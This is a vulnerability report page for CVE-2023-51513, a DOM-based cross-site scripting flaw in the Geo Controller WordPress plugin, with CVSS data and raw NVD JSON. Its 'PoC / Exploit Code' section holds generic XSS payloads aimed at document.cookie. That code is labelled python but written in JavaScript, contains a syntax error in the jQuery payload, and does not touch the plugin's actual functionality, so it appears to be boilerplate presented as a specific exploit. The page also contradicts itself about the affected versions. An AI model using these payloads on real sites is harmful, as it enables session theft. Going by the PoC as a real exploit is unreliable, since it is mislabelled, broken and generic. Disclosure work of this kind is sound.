Security Vulnerability Report
中文
CVE-2023-51513 CVSS 6.5 MEDIUM

CVE-2023-51513

Published: 2026-01-05 14:15:52
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in INTINITUM FORM Geo Controller allows DOM-Based XSS.This issue affects Geo Controller: from n/a through 8.5.2.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Geo Controller < 8.5.2
Geo Controller 插件所有版本至8.5.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2023-51513 DOM-Based XSS PoC // Target: WordPress Geo Controller Plugin < 8.5.2 // Payload that can be injected via plugin's geo functionality const xssPayload = '<script>alert(document.cookie)</script>'; // Example attack scenario: // 1. Attacker with low privilege account injects payload // 2. Payload stored and reflected in geo-related content // 3. Victim visits affected page // 4. Browser executes malicious script in DOM context // Simple PoC for testing: console.log('Testing CVE-2023-51513'); document.write('<img src=x onerror="alert(String.fromCharCode(67,111,111,107,105,101))">'); // Alternative payload using SVG: const svgPayload = '<svg onload=alert(document.domain)>'; // jQuery-based payload: const jqueryPayload = '<img src=x onerror="$(document).ready(function(){alert(document.cookie)})"'>'; // Function to detect vulnerability: function detectXSS() { const params = new URLSearchParams(window.location.search); const geoParam = params.get('geo'); if (geoParam && geoParam.includes('<')) { console.log('Potential XSS vector detected'); } }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-51513", "sourceIdentifier": "[email protected]", "published": "2026-01-05T14:15:52.493", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in INTINITUM FORM Geo Controller allows DOM-Based XSS.This issue affects Geo Controller: from n/a through 8.5.2."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web (XSS o 'cross-site scripting') vulnerabilidad en INTINITUM FORM Geo Controller permite XSS basado en DOM. Este problema afecta a Geo Controller: desde n/a hasta 8.5.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://vdp.patchstack.com/database/wordpress/plugin/cf-geoplugin/vulnerability/wordpress-geo-controller-plugin-8-5-2-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}